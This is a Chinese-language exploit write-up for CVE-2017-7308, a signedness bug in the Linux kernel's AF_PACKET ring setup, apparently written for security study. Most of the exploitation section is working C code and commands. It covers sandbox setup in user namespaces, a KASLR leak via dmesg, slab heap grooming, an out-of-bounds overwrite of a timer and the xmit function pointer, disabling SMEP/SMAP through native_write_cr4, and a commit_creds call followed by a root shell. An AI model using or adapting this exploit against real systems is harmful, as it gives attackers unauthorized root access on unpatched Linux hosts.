1. 前言
此漏洞存在于Linux Kernel 4.10.6
以下的版本中,本文的测试环境为Ubuntu 14.04 LTS
$ git clone git://kernel.ubuntu.com/ubuntu/ubuntu-trusty.git
$ git checkout Ubuntu-lts-4.4.0-31.50_14.04.1
2. 漏洞分析
漏洞发生在net/packet/af_packet.c
的packet_set_ring
函数中,此函数会在设置ring buffer
时被调用,ring buffer
是用于数据包处理的缓冲区,rx_ring
是接收数据的缓冲区,tx_ring
是传输数据的缓冲区,本文用到rx_ring
,分别可以通过setsockopt
的PACKET_RX_RING
和PACKET_TX_RING
参数进行设置, packet_ring_buffer
定义如下:
struct packet_ring_buffer {
struct pgv *pg_vec;
struct tpacket_kbdq_core prb_bdqc;
}
struct pgv {
char *buffer;
}
接下来看导致漏洞的代码
if (po->tp_version >= TPACKET_V3 &&
(int)(req->tp_block_size -
BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
goto out;
当PACKET_VERSION
为TPACKET_V3
时,(int)(req->tp_block_size - BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
会由于符号问题能够绕过这个检测,例如:
A = req->tp_block_size = 4096 = 0x1000
B = req_u->req3.tp_sizeof_priv = (1 << 31) + 4096 = 0x80001000
BLK_PLUS_PRIV(B) = (1 << 31) + 4096 + 48 = 0x80001030
A - BLK_PLUS_PRIV(B) = 0x1000 - 0x80001030 = 0x7fffffd0
(int)0x7fffffd0 = 0x7fffffd0 > 0
这样就会在之后导致一系列问题,在init_prb_bdqc
函数中
static void init_prb_bdqc(struct packet_sock *po,
struct packet_ring_bufferpacket_lookup_frame_in_block *rb,
struct pgv *pg_vec,
union tpacket_req_u *req_u)
{
struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
struct tpacket_block_desc *pbd;
memset(p1, 0x0, sizeof(*p1));
p1->knxt_seq_num = 1;
p1->pkbdq = pg_vec;
pbd = (struct tpacket_block_desc *)pg_vec[0].buffer;
p1->pkblk_start = pg_vec[0].buffer;
p1->kblk_size = req_u->req3.tp_block_size;
p1->knum_blocks = req_u->req3.tp_block_nr;
...
p1->blk_sizeof_priv = req_u->req3.tp_sizeof_priv;
p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv);
prb_init_ft_ops(p1, req_u);
prb_setup_retire_blk_timer(po);
prb_open_block(p1, pbd);
}
p1->blk_sizeof_priv
的类型为unsigned short
,而req_u->req3.tp_sizeof_priv
的类型为unsigned int
,在转换后只会取低两个字节的值,由于之前的检测绕过问题这里可以给p1->blk_sizeof_priv
赋任意值,这样如果BLK_PLUS_PRIV(p1->blk_sizeof_priv) > p1->kblk_size
就可以把p1->max_frame_len
赋值为一个很大的值来绕过很多检测,在之后的prb_open_block
函数中
static void prb_open_block(struct tpacket_kbdq_core *pkc1,
struct tpacket_block_desc *pbd1)
{
...
pkc1->pkblk_start = (char *)pbd1;
pkc1->nxt_offset = pkc1->pkblk_start + BLK_PLUS_PRIV(pkc1->blk_sizeof_priv);
...
}
pkc1->nxt_offset
指向缓冲区ring_buffer
中block
当前可接收数据的起始地址,由于pkc1->blk_sizeof_priv
可控,因此可以控制pkc1->nxt_offset
在接收数据包时造成堆越界。
3. 漏洞利用
EXP参考https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c,由于测试环境的内核版本是4.4
,因此需要修改几处偏移。主要思路是通过堆越界覆盖packet_sock
结构体中的成员packet_sock->xmit
和packet_sock->rx_ring->prb_bdqc->retire_blk_timer
,因此进行堆布局构造连续的多个packet_sock
结构体使前一个packet_sock->rx_ring->prb_bdqc->nxt_offset
指向后面的packet_sock
结构体的上面两个成员。
3.1 安装沙盒
要对更底层的网络进行操作,需要有CAP_NET_RAW
权限,可以通过网络命名空间来实现,编译内核时需要开启CONFIG_USER_NS=y
void setup_sandbox() {
int real_uid = getuid();
int real_gid = getgid();
if (unshare(CLONE_NEWUSER) != 0) {
perror("[-] unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}
if (unshare(CLONE_NEWNET) != 0) {
perror("[-] unshare(CLONE_NEWNET)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/setgroups", "deny")) {
perror("[-] write_file(/proc/self/set_groups)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){
perror("[-] write_file(/proc/self/uid_map)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
perror("[-] write_file(/proc/self/gid_map)");
exit(EXIT_FAILURE);
}
cpu_set_t my_set;
CPU_ZERO(&my_set);
CPU_SET(0, &my_set);
if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
perror("[-] sched_setaffinity()");
exit(EXIT_FAILURE);
}
if (system("/sbin/ifconfig lo up") != 0) {
perror("[-] system(/sbin/ifconfig lo up)");
exit(EXIT_FAILURE);
}
}
3.2 绕过KASLR
由于没有对dmesg
做限制,因此会有残留的syslog
能够泄漏出内核地址
$ dmesg | grep 'Freeing SMP'
[ 0.022785] Freeing SMP alternatives memory: 28K (ffffffff81e83000 - ffffffff81e8a000)
3.3 堆布局
packet_sock
结构体会在用户层创建socket
时在内核创建,它通过kmalloc
分配空间,kmalloc
底层通过slab allocator
进行分配,而为了提升性能减少重复的申请和释放,会用多个slab
组成一个对应特定大小的缓存,在释放操作时并不会真正的释放,而是放入缓存修改成未使用状态,等下一次有相同大小的内存申请时直接从缓存返回,而不需要再次真正的申请物理内存,大小为2^n
,4.4
版本内核的packet_sock
大小为1408
$ pahole -C packet_sock src/ubuntu-trusty/vmlinux
struct packet_sock {
struct sock sk; /* 0 704 */
/* --- cacheline 11 boundary (704 bytes) --- */
struct packet_fanout * fanout; /* 704 8 */
union tpacket_stats_u stats; /* 712 12 */
/* XXX 4 bytes hole, try to pack */
struct packet_ring_buffer rx_ring; /* 728 232 */
/* --- cacheline 15 boundary (960 bytes) --- */
struct packet_ring_buffer tx_ring; /* 960 232 */
/* --- cacheline 18 boundary (1152 bytes) was 40 bytes ago --- */
int copy_thresh; /* 1192 4 */
spinlock_t bind_lock; /* 1196 4 */
struct mutex pg_vec_lock; /* 1200 40 */
/* --- cacheline 19 boundary (1216 bytes) was 24 bytes ago --- */
unsigned int running:1; /* 1240:31 4 */
unsigned int auxdata:1; /* 1240:30 4 */
unsigned int origdev:1; /* 1240:29 4 */
unsigned int has_vnet_hdr:1; /* 1240:28 4 */
/* XXX 28 bits hole, try to pack */
int pressure; /* 1244 4 */
int ifindex; /* 1248 4 */
__be16 num; /* 1252 2 */
/* XXX 2 bytes hole, try to pack */
struct packet_rollover * rollover; /* 1256 8 */
struct packet_mclist * mclist; /* 1264 8 */
atomic_t mapped; /* 1272 4 */
enum tpacket_versions tp_version; /* 1276 4 */
/* --- cacheline 20 boundary (1280 bytes) --- */
unsigned int tp_hdrlen; /* 1280 4 */
unsigned int tp_reserve; /* 1284 4 */
unsigned int tp_loss:1; /* 1288:31 4 */
unsigned int tp_tx_has_off:1; /* 1288:30 4 */
/* XXX 30 bits hole, try to pack */
unsigned int tp_tstamp; /* 1292 4 */
struct net_device * cached_dev; /* 1296 8 */
int (*xmit)(struct sk_buff *); /* 1304 8 */
/* XXX 32 bytes hole, try to pack */
/* --- cacheline 21 boundary (1344 bytes) --- */
struct packet_type prot_hook; /* 1344 56 */
/* size: 1408, cachelines: 22, members: 27 */
/* sum members: 1362, holes: 3, sum holes: 38 */
/* bit holes: 2, sum bit holes: 58 bits */
/* padding: 8 */
};
因此1024 < 1408 < 2048
,packet_sock
会使用kmalloc-2048
缓存,这个缓冲使用0x8000
大小的slab
,这样先申请512
个socket
使kmalloc-2048
缓存耗尽,再创建一个有1024
个块大小为0x8000
的ring_buffer
的packet_sock
,申请block
会使page allocator
的freelist
中的相应大小的页耗尽,因为申请物理页的大小也是按2^n
计算,这样之后再申请就会从第一个大于n
的m
且freelist
中不为空的2^m
大小的页中分割内存
#define KMALLOC_PAD 512
#define PAGEALLOC_PAD 1024
kmalloc_pad(KMALLOC_PAD);
pagealloc_pad(PAGEALLOC_PAD);
3.4 绕过SMEP和SMAP
完成预热后申请一个packet_sock
并且设置一个有两个块大小为0x8000
的ring_buffer
,再申请多个连续的packet_sock
,由于kmalloc-2048
缓存和freelist
中相应大小的页中都已耗尽,这样它们会有很大机会在更大的页上被连续得分配
绕过SMEP
和SMAP
只需把CR4
寄存器的第20
和21
位赋值为0
具体代码如下:
#define NATIVE_WRITE_CR4 0x61220ul
#define CR4_DESIRED_VALUE 0x407f0ul
#define TIMER_OFFSET 880
int oob_setup(int offset) {
unsigned int maclen = ETH_HDR_LEN;
unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +
(maclen < 16 ? 16 : maclen));
unsigned int macoff = netoff - maclen;
unsigned int sizeof_priv = (1u<<31) + (1u<<30) +
0x8000 - BLK_HDR_LEN - macoff + offset;
return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);
}
void oob_timer_execute(void *func, unsigned long arg) {
oob_setup(2048 + TIMER_OFFSET - 8);
int i;
for (i = 0; i < 32; i++) {
int timer = packet_sock_kmalloc();
packet_sock_timer_schedule(timer, 1000);
}
char buffer[2048];
memset(&buffer[0], 0, sizeof(buffer));
struct timer_list *timer = (struct timer_list *)&buffer[8];
timer->function = func;
timer->data = arg;
timer->flags = 1;
oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);
sleep(1);
}
oob_timer_execute((void *)(KERNEL_BASE + NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);
这里是覆盖packet_sock->rx_ring->prb_bdqc->retire_blk_timer
,由于会在retire timer
超时后调用retire_blk_timer->function(retire_blk_timer->data)
,这样就可以通过native_write_cr4(X)
来绕过SMEP
和SMAP
。另外再说一下sizeof_priv
的计算,tpacket
接收数据包时会调用tpacket_rcv
函数
static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
struct packet_type *pt, struct net_device *orig_dev)
{
...
h.raw = packet_current_rx_frame(po, skb, TP_STATUS_KERNEL, (macoff+snaplen));
...
skb_copy_bits(skb, 0, h.raw + macoff, snaplen);
...
}
static void *packet_current_rx_frame(struct packet_sock *po,
struct sk_buff *skb,
int status, unsigned int len)
{
char *curr = NULL;
switch (po->tp_version) {
...
case TPACKET_V3:
return __packet_lookup_frame_in_block(po, skb, status, len);
...
}
}
static void *__packet_lookup_frame_in_block(struct packet_sock *po,
struct sk_buff *skb,
int status,
unsigned int len
)
{
struct tpacket_kbdq_core *pkc;
struct tpacket_block_desc *pbd;
char *curr, *end;
pkc = GET_PBDQC_FROM_RB(&po->rx_ring);
pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);
...
curr = pkc->nxt_offset;
pkc->skb = skb;
end = (char *)pbd + pkc->kblk_size;
/* first try the current block */
if (curr+TOTAL_PKT_LEN_INCL_ALIGN(len) < end) {
prb_fill_curr_block(curr, pkc, pbd, len);
return (void *)curr;
}
/* Ok, close the current block */
prb_retire_current_block(pkc, po, 0);
/* Now, try to dispatch the next block */
curr = (char *)prb_dispatch_next_block(pkc, po);
if (curr) {
pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);
prb_fill_curr_block(curr, pkc, pbd, len);
return (void *)curr;
}
...
}
static void *prb_dispatch_next_block(struct tpacket_kbdq_core *pkc,
struct packet_sock *po)
{
...
prb_open_block(pkc, pbd);
return (void *)pkc->nxt_offset;
}
__packet_lookup_frame_in_block
会返回当前缓冲区中可接收数据的起始地址,由于curr+TOTAL_PKT_LEN_INCL_ALIGN(len) < end
,之后就会从第二个块中找空余的空间(这也是上面创建两个块的原因),blk_sizeof_priv = 0x8000 - BLK_HDR_LEN - macoff + 2048 + TIMER_OFFSET - 8
会在计算p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv)
时使p1->max_frame_len
为一个很大的值以此来绕过后面的一些检测,h.raw = pg_vec[1].buffer + blk_sizeof_priv + BLK_HDR_LEN = pg_vec[1].buffer - macoff + 2048 + TIMER_OFFSET - 8
,调用skb_copy_bits(skb, 0, h.raw + macoff, snaplen)
把数据复制到缓存区时的起始地址为pg_vec[1].buffer + 2048 + TIMER_OFFSET - 8
,跳过后面紧跟的一个packet_sock
,这样最终的复制起始地址为后面紧跟的第二个packet_sock + TIMER_OFFSET - 6
(由于对齐导致是-6
,为了把一些值置为0)
0xffff8800346c0b6a
刚好在前面创建的32
个packet_sock
中
memcpy
后成功覆盖了retire_blk_timer
3.5 提权
跟上一步类似只是这里覆盖packet_sock
的xmit
函数指针,它会在发送数据时被调用,在关闭SMEP
后返回到用户空间执行commit_creds(prepare_kernel_cred(0))
实现提权
#define XMIT_OFFSET 1304
void oob_id_match_execute(void *func) {
int s = oob_setup(2048 + XMIT_OFFSET - 64);
int ps[32];
int i;
for (i = 0; i < 32; i++)
ps[i] = packet_sock_kmalloc();
char buffer[2048];
memset(&buffer[0], 0, 2048);
void **xmit = (void **)&buffer[64];
*xmit = func;
oob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);
for (i = 0; i < 32; i++)
packet_sock_id_match_trigger(ps[i]);
}
oob_id_match_execute((void *)&get_root_payload);
3.6 恢复网络
由于隔离了网络命名空间,导致只有一个回环接口不能连接网络
但是现在是root
权限,因此可以加入到init
进程的网络命名空间来恢复网络
void exec_shell() {
char *shell = "/bin/bash";
char *args[] = {shell, "-i", NULL};
int fd;
fd = open("/proc/1/ns/net", O_RDONLY);
if (fd == -1)
{
perror("error opening /proc/1/ns/net");
exit(EXIT_FAILURE);
}
if (setns(fd, CLONE_NEWNET) == -1)
{
perror("error calling setns");
exit(EXIT_FAILURE);
}
execve(shell, args, NULL);
}
4. 参考
- https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
- https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
- https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308
- http://blog.nsfocus.net/gdb-kgdb-debug-application/
- http://blackbunny.io/linux-kernel-x86-64-bypass-smep-kaslr-kptr_restric/